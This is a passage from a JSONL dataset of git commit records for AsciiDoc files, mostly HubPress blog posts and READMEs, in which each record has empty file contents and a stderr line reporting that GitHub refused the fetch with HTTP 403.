ubpress.io,yangsheng1107\/hubpress.io,aql\/hubpress.io,kim0\/hubpress.io,ErJ101\/hbspractise,ashalkhakov\/hubpress.io,chackomathew\/blog,xinmeng1\/note,abesn\/hubpress.io,roelvs\/hubpress.io,lawrencetaylor\/hubpress.io,jlcurty\/jlcurty.github.io-,DavidTPate\/davidtpate.com,puff-tw\/hubpress.io,kornel661\/blog-test-jm,benignbala\/benignbala.hubpress.io,pdudits\/hubpress,jerometambo\/blog,gogonkt\/makenothing,AirHacX\/blog.airhacx.com,sanctumware\/hubpress,pdudits\/pdudits.github.io,jbutz\/hubpress-test,rorosaurus\/hubpress.io,chackomathew\/blog,mairandomness\/randomblog,mikqi\/blog,fwalloe\/infosecbriefly,natsu90\/hubpress.io,thesagarsutar\/hubpress,OlympusOnline2\/announcements,adjiebpratama\/press,jamarortiz\/pragmaticalware,kim0\/hubpress.io,nandansaha\/AroundTheWeb,vuthaihoc\/vuthaihoc.github.io,adest\/press,magivfer\/pages,harichen\/harichen.io,akhmetgali\/hubpress.io,Evolution2626\/blog,shunkou\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,alexknowshtml\/thebigmove,joescharf\/joescharf.github.io,anandjagadeesh\/blog,sxgc\/blog,rorosaurus\/hubpress.io,IEEECompute\/blog,igovsol\/blog,celsogg\/blog,porolakka\/hubpress.io,RussellSnyder\/hubpress-test,elinep\/blog,ice09\/ice09ng,AlexL777\/hubpre
ssblog,thaibeouu\/blog,RussellSnyder\/hubpress-test,lichengzhu\/blog,qingyuqy\/qingyuqy.io,miroque\/shirokuma,SnorlaxH\/blog.urusa.me,corporatesanyasi\/corporatesanyasi.github.io,victorcouste\/blog,dawn-chiniquy\/clear-project.org,Perthmastersswimming\/hubpress.io,e-scape\/blog,apoch\/blog,rubyinhell\/hubpress.io,magivfer\/pages,koter84\/blog,Astrokoala-Studio\/hubpress.io,anthonny\/personal-blog,shinnoki\/hubpress.io,itsmyr4bbit\/blog,wzzrd\/hubpress.io,jjmean2\/server-study,Jekin6\/blog,simpleHoChun\/blog,elinep\/blog,christofmarti\/blog,andreassiegelrfid\/hubpress.io,anshu92\/blog,discimport\/blog.discimport.dk,lauesa\/Blog,pdudits\/hubpress,tom-konda\/blog,palaxi00\/palaxi00.github.io,jjmean2\/server-study,thesagarsutar\/hubpress,porolakka\/hubpress.io,ml4den\/hubpress,agentmilindu\/hubpress.io,seturne\/hubpress.io,gilangdanu\/blog,whelamc\/life,nicksam112\/nicksam112.github.io,clear-project\/blog,jamarortiz\/pragmaticalware,crotel\/meditation,shunkou\/blog,josegomezr\/blog,clear-project\/blog,benignbala\/hubpress.io,jbutz\/hubpress-test,codetricity\/journey,adamperer\/diary,pej\/hubpress.io,mrfgl\/blog,anthonny\/personal-blog,hiun\/hubpress.io,atomfrede\/shiny-adventure,OlympusOnline2\/announcements,lawrencetaylor\/hubpress.io,xinmeng1\/note,mkent-at-rivermeadow-dot-com\/hubpress.io,paolo215\/blog,benignbala\/benignbala.hubpress.io,Astrokoala-Studio\/hubpress.io,mrfgl\/blog,agentmilindu\/hubpress.io,crobby\/hubpress.io,bemug\/devblog,SockPastaRock\/hubpress.io,jcsirot\/hubpress.io,andreassiegelrfid\/hubpress.io,devananda\/devananda.github.io,setupminimal\/blog,agentmilindu\/hubpress.io,mikqi\/blog,trycrmr\/hubpress.io,lawrencetaylor\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,julianrichen\/blog,mimiz\/mimiz.github.io,hang-h\/hubpress.io,agentmilindu\/hubpress.io,ReadyP1\/hubpress.io,JacobSamro\/blog,manelvf\/blog,mufarooqq\/blog,tehbilly\/blog,blackGirlsCode\/blog,cmhgroupllc\/blog,sxgc\/blog,apoch\/blog,laibaogo\/hubpress.io,pej\/hubpress.io,topluluk\/blog,IEEECompute\/blog,mikqi\/blog,e-scape\/blog,lrabiet\/patisserie,roelvs\/hubpress.io,mrfgl\/blog,gbougeard\/blog.english,natsu90\/hubpress.io,baocongchen\/blogs,thaibeouu\/blog,Lukas238\/the-holodeck,jmini\/hubpress.io,sebprev\/blog,jerometambo\/blog,chackomathew\/blog,booleanbalaji\/hubpress.io,nthline\/hubpress.io,Nepal-Blockchain\/danphe-blogs,princeminz\/blog,moonPress\/press.io,lichengzhu\/blog,MinxianLi\/hubpress.io,btsibr\/myhubpress,nandansaha\/AroundTheWeb,willcrisis\/www.willcrisis.com,arabindamoni\/hubpress.io,pascalgrimaud\/hubpress.io,demiansan\/demiansan.github.io,csiebler\/hubpress-test,celsogg\/blog,ucide-coruptia\/ucide-coruptia.ro,joescharf\/joescharf.github.io,blackGirlsCode\/blog,palaxi00\/palaxi00.github.io,cmhgroupllc\/blog,rynop\/rynop.hubpress.io,binout\/javaonemorething,btsibr\/myhubpress,miroque\/shirokuma,baocongchen\/blogs,ruaqiwei23\/blog,Lukas238\/the-holodeck,ml4den\/hubpress,ucide-coruptia\/ucide-coruptia.ro,pdudits\/hubpress,Jason2013\/hubpress,Lukas238\/the-holodeck,pej\/hubpress.io,dmacstack\/glob,jmini\/hubpress.io,porolakka\/hubpress.io,ruaqiwei23\/blog,JacobSamro\/blog,gogonkt\/makenothing,adjiebpratama\/press,kornel661\/blog-test-jm,moonPress\/press.io,puff-tw\/hubpress.io,msavy\/rhymewithgravy.com,ice09\/ice09ng,gsha0\/hubpress.io,willcrisis\/www.willcrisis.com,berryzed\/tech-blog,eimajenthat\/hubpress.io,moonPress\/press.io,adjiebpratama\/press,abesn\/hubpress.io,rynop\/rynop.hubpress.io,Bloggerschmidt\/bloggerschmidt.de,celsogg\/blog,amberry\/blog,jcsirot\/hubpress.io,JohanBrune
t\/hubpress.io,codetricity\/journey,topicusonderwijs\/topicusonderwijs.github.io,fwalloe\/infosecbriefly,adest\/press,danen-carlson\/blog,lauesa\/Blog,koter84\/blog,anthonny\/personal-blog,philippevidal80\/blog,bemug\/devblog,mcrotty\/hubpress.io,josegomezr\/blog,booleanbalaji\/hubpress.io,benignbala\/benignbala.hubpress.io,loetjoe\/blog,arabindamoni\/hubpress.io,Evolution2626\/blog,Jekin6\/blog,igovsol\/blog,xinmeng1\/note,shunkou\/blog,lichengzhu\/blog,ashalkhakov\/hubpress.io,rorohiko21\/blog,ditirambo\/ditirambo.es,sebarid\/pages,thaibeouu\/blog,christofmarti\/blog,heartnn\/hubpress.io,jerometambo\/blog,atomfrede\/shiny-adventure,hva314\/blog,gbougeard\/blog.english,pascalgrimaud\/hubpress.io,pramodjg\/articles,dsuryakusuma\/dsuryakusuma.github.io,loetjoe\/blog,seturne\/hubpress.io,discimport\/blog.discimport.dk,shunkou\/blog,pramodjg\/articles,Port666\/hubpress.io,ashalkhakov\/hubpress.io,lichengzhu\/blog,AnassKartit\/anasskartit.github.io,nicolaschaillot\/pechdencouty,binout\/javaonemorething,berryzed\/tech-blog,sakkemo\/blog,Jason2013\/hubpress,csiebler\/hubpress-test,SockPastaRock\/hubpress.io,jfavlam\/Concepts,melix\/hubpress,nthline\/hubpress.io,DavidTPate\/davidtpate.com,josegomezr\/blog,tmdgus0118\/blog.code404.co.kr,paolo215\/blog,akhmetgali\/hubpress.io,hutchr\/hutchr.github.io,akhmetgali\/hubpress.io,matthardwick\/hubpress.io,Nepal-Blockchain\/danphe-blogs,btsibr\/myhubpress,matthardwick\/hubpress.io,jabbytechnologies\/blog,jsiu22\/blog,cmhgroupllc\/blog,jsiu22\/blog,artavels\/pages,koter84\/blog,plyom\/hubpress.io,berryzed\/tech-blog,laibaogo\/hubpress.io,elinep\/blog,yangsheng1107\/hubpress.io,msavy\/rhymewithgravy.com,mrfgl\/blog,anthonny\/personal-blog,cmolitor\/blog,corporatesanyasi\/corporatesanyasi.github.io,AlexL777\/hubpressblog,crobby\/hubpress.io,kim0\/hubpress.io,ErJ101\/hbspractise,anwfr\/blog.anw.fr,IEEECompute\/blog,juhuntenburg\/gsoc2017,Jason2013\/hubpress,201507\/blog,ncomet\/asciiblog,marksubbarao\/hubpress.io,shinnoki\/hubpress.io,kobusb\/blog,heartnn\/hubpress.io,simonturesson\/hubpresstestsimon,benignbala\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,celsogg\/blog,lrabiet\/patisserie,juhuntenburg\/gsoc2017,dmacstack\/glob,nandansaha\/AroundTheWeb,heartnn\/hubpress.io,jsiu22\/blog,hutchr\/hutchr.github.io,anshu92\/blog,jabbytechnologies\/blog,MinxianLi\/hubpress.io,DavidTPate\/davidtpate.com,gsha0\/hubpress.io,SnorlaxH\/blog.urusa.me,princeminz\/blog,topicusonderwijs\/topicusonderwijs.github.io,pdudits\/hubpress,Port666\/hubpress.io,seturne\/hubpress.io,kobusb\/blog,eimajenthat\/hubpress.io,arabindamoni\/hubpress.io,pej\/hubpress.io,Adyrhan\/adyrhan.github.io,hva314\/blog,kobusb\/blog,brendena\/hubpress.io,jjmean2\/server-study,crotel\/studio,joescharf\/joescharf.github.io,erramuzpe\/gsoc2016,baocongchen\/blogs,brendena\/hubpress.io,aql\/hubpress.io,DaOesten\/hubpress.io,codelab-lbernard\/blog,arabindamoni\/hubpress.io,entropyz\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,devananda\/devananda.github.io,whelamc\/life,aql\/hubpress.io,anshu92\/blog,topicusonderwijs\/topicusonderwijs.github.io,booleanbalaji\/hubpress.io,fghhfg\/hubpress.io,rubyinhell\/hubpress.io,jlmcgehee21\/nooganeer,miroque\/shirokuma,simpleHoChun\/blog,JohanBrunet\/hubpress.io,mimiz\/mimiz.github.io,msavy\/rhymewithgravy.com,danen-carlson\/blog,anandjagadeesh\/blog,SnorlaxH\/blog.urusa.me,jbutz\/hubpress-test,natsu90\/hubpress.io,isaacriquelme\/endata.do,miroque\/shirokuma,Lukas238\/the-holodeck,wzzrd\/hubpress.io,Jekin6\/blog,DaOesten\/hubpress.io,isaacriquelme\/endata.do,pe
pite\/hubpress.io,itsmyr4bbit\/blog,plyom\/hubpress.io,palaxi00\/palaxi00.github.io,mufarooqq\/blog,itsmyr4bbit\/blog,AlexL777\/hubpressblog,jsiu22\/blog,PerthHackers\/blog,mcrotty\/hubpress.io,pdudits\/pdudits.github.io,AnassKartit\/anasskartit.github.io,ottoandry\/ottoandry1,wzzrd\/hubpress.io,MinxianLi\/hubpress.io,hang-h\/hubpress.io,palaxi00\/palaxi00.github.io,adamperer\/diary,setupminimal\/blog,anwfr\/blog.anw.fr,palaxi00\/palaxi00.github.io,yangsheng1107\/hubpress.io,mimiz\/mimiz.github.io,jpcanovas\/myBlog,rubyinhell\/hubpress.io,princeminz\/blog,JacobSamro\/blog,simonturesson\/hubpresstestsimon,jabbytechnologies\/blog,mcrotty\/hubpress.io,ciena-blueplanet\/developers.blog,AnassKartit\/anasskartit.github.io,topluluk\/blog,dawn-chiniquy\/clear-project.org,codelab-lbernard\/blog,victorcouste\/blog,Port666\/hubpress.io,christofmarti\/blog,jmini\/hubpress.io,benignbala\/hubpress.io,marksubbarao\/hubpress.io,koter84\/blog,julianrichen\/blog,anwfr\/blog.anw.fr,mkent-at-rivermeadow-dot-com\/hubpress.io,errorval\/blog,laibaogo\/hubpress.io,devananda\/devananda.github.io,ciena-blueplanet\/developers.blog,ice09\/ice09ng,ncomet\/asciiblog,roelvs\/hubpress.io,nicolaschaillot\/pechdencouty,qingyuqy\/qingyuqy.io,yaks-all-the-way-down\/hubpress.github.io,jlmcgehee21\/nooganeer,abesn\/hubpress.io,btsibr\/myhubpress,alexknowshtml\/thebigmove,jpcanovas\/myBlog,matthardwick\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,Evolution2626\/blog,brendena\/hubpress.io,duggiemitchell\/JavascriptMuse,palaxi00\/palaxi00.github.io,jbutz\/hubpress-test,nthline\/hubpress.io,rorohiko21\/blog,OdieD8\/hubpress.io,jlcurty\/jlcurty.github.io-,AirHacX\/blog.airhacx.com,josegomezr\/blog,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,palaxi00\/palaxi00.github.io,marksubbarao\/hubpress.io,ncomet\/asciiblog,RussellSnyder\/hubpress-test,hiun\/hubpress.io,artavels\/pages,vuthaihoc\/vuthaihoc.github.io,artavels\/pages,igovsol\/blog,e-scape\/blog,sillyleo\/bible.notes,jfavlam\/Concepts,mairandomness\/randomblog,pepite\/hubpress.io,pepite\/hubpress.io,discimport\/blog.discimport.dk,ottoandry\/ottoandry1,sxgc\/blog,iKnowMagic\/hubpress.io,Evolution2626\/blog,joshuarrrr\/hubpress.io,pramodjg\/articles,puff-tw\/hubpress.io,victorcouste\/blog,crotel\/meditation,Adyrhan\/adyrhan.github.io,ambarishpande\/blog,SnorlaxH\/blog.urusa.me,sharmivssharmi\/sharmipress,moonPress\/press.io,philippevidal80\/blog,ciena-blueplanet\/developers.blog,gbougeard\/blog.english,ditirambo\/ditirambo.es,adjiebpratama\/press,mairandomness\/randomblog,anwfr\/blog.anw.fr,IEEECompute\/blog,DaOesten\/hubpress.io,AlexL777\/hubpressblog,iKnowMagic\/hubpress.io,plyom\/hubpress.io,juhuntenburg\/gsoc2017,Astrokoala-Studio\/hubpress.io,demiansan\/demiansan.github.io,BenBals\/hubpress,erramuzpe\/gsoc2016,blackGirlsCode\/blog,tehbilly\/blog,Perthmastersswimming\/hubpress.io,nicksam112\/nicksam112.github.io,alexknowshtml\/thebigmove,artavels\/pages,amberry\/blog,tom-konda\/blog,crobby\/hubpress.io,ncomet\/asciiblog,pepite\/hubpress.io,hiun\/hubpress.io,cmolitor\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,lauesa\/Blog,OdieD8\/hubpress.io,mikqi\/blog,hutchr\/hutchr.github.io,erramuzpe\/gsoc2016,AnassKartit\/anasskartit.github.io,gogonkt\/makenothing,lauesa\/Blog,brendena\/hubpress.io,entropyz\/blog,Abdul2\/abdul2.github.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mimiz\/mimiz.github.io,aql\/hubpress.io,YvonneZhang\/yvonnezhang.github.io,ambarishpande\/blog,jlmcgehee21\/nooganeer,ucide-coruptia\/ucide-coruptia.ro,trycrmr\/hubpress.io,jfavlam\/C
oncepts,benignbala\/hubpress.io,juhuntenburg\/gsoc2017,tmdgus0118\/blog.code404.co.kr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"004799bd2f0e906863c7270317fed792d9d9b4ef","subject":"Reformatted README","message":"Reformatted README\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c9b8ae1aaa59870a8738ce787f0f600ffc76f88","subject":"Updated documentationd","message":"Updated documentationd","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"711dcb39bffd3f57817f23f3495b23e220f44e67","subject":"initial commit","message":"initial commit\n","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eclipse\/rdf4j.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"1fe3506168c9966cc4fc1e578ae6215151bd8445","subject":"Specify recommended version of gpg4win","message":"Specify recommended version of gpg4win","repos":"dejavusecurity\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dejavusecurity\/OutlookPrivacyPlugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b67f2f9ac885e1664a2fbc79262064fc0d14daa6","subject":"Updated copy elision","message":"Updated copy elision\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"653cfcd40725d231694468aaa917aa00f4bd7383","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"341d0ea54780342d6d993f5b2dc174e577393e3d","subject":"Update 2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","message":"Update 2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","new_file":"_posts\/2017-11-09-Episode-117-Groot-Vomit-Mech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e0eeda7b163a4d3b0cc9dbda94b82ed2f609c30","subject":"y2b create post TOP SECRET SMARTPHONE","message":"y2b create post TOP SECRET SMARTPHONE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-06-TOP-SECRET-SMARTPHONE.adoc","new_file":"_posts\/2016-04-06-TOP-SECRET-SMARTPHONE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6055f70fad7f4711f975009477b06bde21170d1","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3bf818ab605bfa1d0c4c2af089f411d703cb8ca","subject":"Update 2017-10-04-JEE-passe-a-la-fondation-Eclipse.adoc","message":"Update 2017-10-04-JEE-passe-a-la-fondation-Eclipse.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-10-04-JEE-passe-a-la-fondation-Eclipse.adoc","new_file":"_posts\/2017-10-04-JEE-passe-a-la-fondation-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e992f50bad1d7e2f030e12e49bd0df08d5f4f93f","subject":"y2b create post Note 3 vs iPhone 6 (5.5\\","message":"y2b create post Note 3 vs iPhone 6 (5.5\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-19-Note-3-vs-iPhone-6-55.adoc","new_file":"_posts\/2014-06-19-Note-3-vs-iPhone-6-55.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b044a680952f346d69f4d90c8c5d5a230ae44983","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 
2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"978cf5c4851a97f41f51594894a2367f87fff8ec","subject":"Update 2015-04-14-A-Beginning.adoc","message":"Update 2015-04-14-A-Beginning.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-A-Beginning.adoc","new_file":"_posts\/2015-04-14-A-Beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a8257af74b1bb6b097827798edff228432b9b1b","subject":"Update 2016-09-26-Word-Camp-Tokyo-2016.adoc","message":"Update 2016-09-26-Word-Camp-Tokyo-2016.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-09-26-Word-Camp-Tokyo-2016.adoc","new_file":"_posts\/2016-09-26-Word-Camp-Tokyo-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e3690904442515ae9c77daecbe9f9e49cf0d0aa","subject":"Update 2016-02-28-How-to-chat-securely.adoc","message":"Update 2016-02-28-How-to-chat-securely.adoc","repos":"al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io","old_file":"_posts\/2016-02-28-How-to-chat-securely.adoc","new_file":"_posts\/2016-02-28-How-to-chat-securely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/al1enSuu\/al1enSuu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbdd8f3e8a4b4b3eada2d6c49b9288313d7b8914","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2f807680af856010b9026e0e6c6398ee48b6690","subject":"Update 2017-05-25-Hello-World.adoc","message":"Update 2017-05-25-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-25-Hello-World.adoc","new_file":"_posts\/2017-05-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ac66b8292dd27fee86d6d0b8206fb8d7114df14c","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cce818fde583299f787c3dc8b8591942498f9d0e","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fddf3cad6a168bb7e55e4181d19871faebce2f4f","subject":"Update 2015-10-08-Znakomstvo-s-BEM.adoc","message":"Update 2015-10-08-Znakomstvo-s-BEM.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Znakomstvo-s-BEM.adoc","new_file":"_posts\/2015-10-08-Znakomstvo-s-BEM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"482872ee848748fa7ddfa00ac6bcb47f2a51e83b","subject":"Update 2015-04-22-iOS-interview-part-1.adoc","message":"Update 2015-04-22-iOS-interview-part-1.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-22-iOS-interview-part-1.adoc","new_file":"_posts\/2015-04-22-iOS-interview-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24782c96030d10abec6a8ab61429d253c7824ad2","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59ce1ecf15170ddaa7bebae00bd400181b007cf8","subject":"job: #11444 Performed analysis on training options for customer.","message":"job: #11444 Performed analysis on training options for 
customer.\n","repos":"leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/training_proposal.adoc","new_file":"doc\/notes\/11444_wasl\/training_proposal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"def76d228aa716ff015350f07d94465c450bd347","subject":"y2b create post NVIDIA SHIELD - The Console Killer?","message":"y2b create post NVIDIA SHIELD - The Console Killer?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-01-NVIDIA-SHIELD--The-Console-Killer.adoc","new_file":"_posts\/2015-07-01-NVIDIA-SHIELD--The-Console-Killer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The 